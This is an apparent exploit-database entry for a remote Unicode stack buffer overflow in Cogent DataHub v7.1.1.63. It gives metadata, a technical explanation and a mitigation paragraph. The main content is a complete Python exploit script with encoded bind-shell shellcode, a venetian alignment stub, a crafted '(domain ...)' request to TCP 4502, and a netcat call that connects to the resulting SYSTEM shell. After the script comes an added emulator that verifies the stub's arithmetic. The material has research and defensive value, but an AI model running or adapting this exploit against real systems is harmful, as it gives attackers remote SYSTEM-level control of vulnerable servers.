Suggest Exploit
Vendor: Cogent Datahub
By: Luigi Auriemma and Steven Seeley
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Cogent Datahub
Affected Version From: v7.1.1.63
Affected Version To: v7.1.1.63
Patch Exists: YES
Related CWE: N/A
CPE: a:cogent_datahub:cogent_datahub
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2003, Windows XP SP3
2009

Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit

This is a remote stack buffer overflow in Cogent Datahub <= v7.1.1.63, found by Luigi Auriemma and turned into a working exploit by Steven Seeley. The DataHub TCP listener on port 4502 accepts text commands such as (domain "..."); the quoted argument is widened to UTF-16LE (every byte becomes "byte 00") before it lands in a fixed-size stack buffer, so an over-long argument overwrites the saved frame pointer and the saved return address. The exploit therefore has to work within Unicode constraints: 1019 'a' characters reach the return address, which is replaced with a Unicode-compatible jmp esp at 0x0055007f; a venetian alignment stub then computes esp+0xfe with add/sub arithmetic, carves a RETN byte in place (0x61 + 0x62 = 0xc3) and returns into an alphanumeric Unicode decoder that starts a bind shell on TCP port 1337. The service runs as NT AUTHORITY\SYSTEM, so the shell is SYSTEM. The exploit was tested on Windows Server 2003 and Windows XP SP3.

Mitigation:

The vendor has released a patch; upgrade to a version of Cogent Datahub later than v7.1.1.63. Until the update is applied, do not expose the DataHub listener (TCP 4502) beyond the hosts that need it; a (domain "...") command whose quoted argument runs to a thousand or more characters matches this exploit and should be treated as an attack indicator.

Exploit-DB raw data:

#!/usr/bin/python
#
# Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit
# tested on:
# - windows server 2003
# - windows XP sp3
# questions >> @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>

import socket,time,sys,os

# bindshell on port 1337
shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
"IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
"2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
"04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
"PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
"M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
"XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
"6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
"8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
"PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
"0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
"XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
"8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
"O8VKO8PKZA")

# Venetian (Unicode) alignment stub. The target widens every byte to
# "byte 00", so each real instruction is followed by "\x6f", which turns
# the inserted 00 into a harmless "add [edi],ch" (00 6f 00) filler.
align= ""
align += "\x54"			# push esp
align += "\x6f"
align += "\x58"			# pop eax (eax = esp, the start of this stub)
align += "\x6f"
align += "\x05\x6f\x11"	# add eax,11006f00
align += "\x6f" 
align += "\x2d\x37\x01"	# sub eax,01003700
align += "\x6f"
align += "\x2d\x37\x10"	# sub eax,10003700 (net: eax = esp + 0x100)
align += "\x6f"
align += "\x50"			# push eax (saved as the RETN target: the shellcode starts at esp+0x100)
align += "\x6f"
align += "\x48"			# dec eax
align += "\x6f"
align += "\x48"			# dec eax (eax = esp + 0xfe, the slot holding the 0x62 below)
align += "\x6f"
align += "\x55"			# push ebp (saved EBP was overwritten with 0x00610061 by the 'a' padding)
align += "\x6f"
align += "\x59"			# pop ecx (cl = 0x61)
align += "\x08"			# add [eax],cl (carve a 'RETN' onto the stack)
align += "\x6f"
align += "\x40"			# inc eax
align += "\x6f"
align += "\x40"			# inc eax
align += "\x6f\x41" * (48)	# inc ecx (will not affect our payload)
align += "\x6f"
align += "\x62"			# becomes our carved RETN on the stack (0x61+0x62=0xc3)

# DataHub command on TCP 4502: the quoted argument overflows a wide-char
# stack buffer; 1019 widened 'a's reach the saved return address.
request = "(domain \""
request += "\x61" * 1019
request += "\x7f\x55" 	# jmp esp 0x0055007f (7f 00 55 00 after widening)
request += align
request += shellcodez
request += "\")\r\n"

def banner():
	banner = "\n-----------------------------------------------------\n"
	banner += "------ Cogent Datahub Unicode Overflow Exploit ------\n"
	banner += "------------- Found by Luigi Auriemma ---------------\n"
	banner += "--------- SYSTEM exploit by Steven Seeley -----------\n"
	return banner

if len(sys.argv) < 2:
	print banner()
	print "(-) Usage: %s <target addr> " % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
print banner()

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,4502))	# Cogent DataHub TCP listener
except socket.error:
    print "[-] Connection to %s failed!" % (target)
    sys.exit(0)

print "(+) Sending overflow..."
s.send(request)
s.recv(1024)
# wait for the target, sheesh.
time.sleep(2)
print "(+) Getting shell.."
os.system("nc -vv %s 1337" % target)
s.close()
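The alignment stub is the subtle part of this exploit: because the target widens every byte to UTF-16LE, the script interleaves "\x6f" filler so the inserted 00 bytes decode as a harmless add [edi],ch, then uses add/sub arithmetic with Unicode-safe immediates to reach esp+0xfe and carve a RETN in place. The Python 3 script below is an added example, not part of the original Exploit-DB script and not code from Cogent or the exploit's authors. It restates the stub and the return-address bytes from the script, models the widening, and emulates the few opcodes the stub uses to confirm where the carve and the RETN land. The base stack address 0x0012F000 is a hypothetical placeholder, and only the first line of the shellcode is included because the emulator stops at the RETN.

```python
"""Self-check for the Unicode alignment stub used by the exploit above.

Added example, not part of the original Exploit-DB script.  It restates the stub and
return-address bytes, models the narrow-to-wide conversion (every byte B becomes B 00)
and emulates only the opcodes the stub uses, to confirm that EAX lands on the 0x62 byte
that `add [eax],cl` turns into RETN and that RETN lands on the first shellcode byte.
"""
import struct

MASK = 0xFFFFFFFF
# Restated from the exploit: the stub exactly as sent, before widening.
ALIGN = (
    b"\x54\x6f\x58\x6f"       # push esp / pop eax          eax = esp
    b"\x05\x6f\x11\x6f"       # add eax, 0x11006f00
    b"\x2d\x37\x01\x6f"       # sub eax, 0x01003700
    b"\x2d\x37\x10\x6f"       # sub eax, 0x10003700        eax = esp + 0x100
    b"\x50\x6f"               # push eax                    the RETN target
    b"\x48\x6f\x48\x6f"       # dec eax x2                  eax = esp + 0xfe
    b"\x55\x6f\x59"           # push ebp / pop ecx          cl = low byte of EBP
    b"\x08\x6f"               # add [eax], cl               0x62 + 0x61 = 0xc3
    b"\x40\x6f\x40"           # inc eax x2
    + b"\x6f\x41" * 48        # inc ecx filler
    + b"\x6f\x62"             # the byte that becomes RETN
)
JMP_ESP = b"\x7f\x55"          # widens to 7f 00 55 00 == 0x0055007f
PADDING = b"\x61" * 1019       # the 'a' run that reaches the saved return address
SHELLCODE_PREFIX = b"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"  # decoder's first line
SAVED_EBP = 0x00610061         # what the 'a' padding leaves in the saved frame pointer

def unicode_expand(data):
    """Model the narrow-to-wide conversion: each byte becomes that byte then 0x00."""
    return b"".join(bytes((b, 0)) for b in data)

def unicode_safe(data):
    """True if every byte survives widening and the (domain "...") quoting intact."""
    return all(0 < b < 0x80 and b != 0x22 for b in data)   # no NUL, no '"', no high bytes

def emulate_stub(stream, base, ebp):
    """Run the widened `stream` as if it sat at `base` (ESP when jmp esp fires).
    Only the opcodes the stub uses are modelled; execution stops at the first RETN
    and returns (memory, address RETN transfers to).  Anything else raises ValueError."""
    mem, stack, eip = bytearray(stream), [], 0
    regs = {"eax": 0, "ecx": 0, "esp": base, "ebp": ebp}

    def push(value):                # push esp stores the pre-decrement value
        stack.append(value & MASK)
        regs["esp"] -= 4

    def pop():
        regs["esp"] += 4
        return stack.pop()

    while True:
        op = mem[eip]
        if op == 0x00 and mem[eip + 1] == 0x6F:     # add [edi+0], ch: the filler
            eip += 3
        elif op == 0x00 and mem[eip + 1] == 0x08:   # add [eax], cl: the carve
            idx = (regs["eax"] - base) & MASK
            mem[idx] = (mem[idx] + (regs["ecx"] & 0xFF)) & 0xFF
            eip += 2
        elif op in (0x05, 0x2D):                    # add / sub eax, imm32
            imm = struct.unpack_from("<I", mem, eip + 1)[0]
            regs["eax"] = (regs["eax"] + (imm if op == 0x05 else -imm)) & MASK
            eip += 5
        elif op in (0x40, 0x48):                    # inc / dec eax
            regs["eax"] = (regs["eax"] + (1 if op == 0x40 else -1)) & MASK
            eip += 1
        elif op == 0x41:                            # inc ecx
            regs["ecx"] = (regs["ecx"] + 1) & MASK
            eip += 1
        elif op in (0x50, 0x54, 0x55):              # push eax / esp / ebp
            push(regs[{0x50: "eax", 0x54: "esp", 0x55: "ebp"}[op]])
            eip += 1
        elif op in (0x58, 0x59):                    # pop eax / ecx
            regs[{0x58: "eax", 0x59: "ecx"}[op]] = pop()
            eip += 1
        elif op == 0xC3:                            # RETN
            return mem, pop()
        else:
            raise ValueError("unmodelled opcode %#04x at offset %#x" % (op, eip))

def check_payload(base=0x0012F000, ebp=SAVED_EBP):
    """Widen the stub plus the start of the shellcode, run it, and report the layout."""
    stub_len = len(unicode_expand(ALIGN))
    mem, target = emulate_stub(unicode_expand(ALIGN + SHELLCODE_PREFIX), base, ebp)
    return {
        "jmp_esp": struct.unpack("<I", unicode_expand(JMP_ESP))[0],
        "eip_offset": len(unicode_expand(PADDING)),    # widened bytes before saved EIP
        "carve_offset": stub_len - 2,                   # where the 0x62 sat
        "carved_byte": mem[stub_len - 2],
        "shellcode_offset": stub_len,
        "ret_target_offset": target - base,
    }

def carve_succeeds(ebp):
    """True if this saved-EBP value (only CL matters) makes the stub produce a RETN."""
    try:
        return check_payload(ebp=ebp)["carved_byte"] == 0xC3
    except ValueError:              # the carve missed and execution ran into junk
        return False
```

check_payload() reports the jmp esp address 0x0055007f, the saved return address at widened offset 2038 (1019 characters times two), the carved 0xc3 at offset 254 and a RETN target at offset 256, which is the first byte of the alphanumeric decoder. carve_succeeds() shows that only the low byte of the overwritten saved EBP matters, which is why the padding is 'a' (0x61) and the byte to be carved is 0x62; any other low byte leaves a non-RETN opcode at esp+0xfe and the emulator, like the real target, runs into junk.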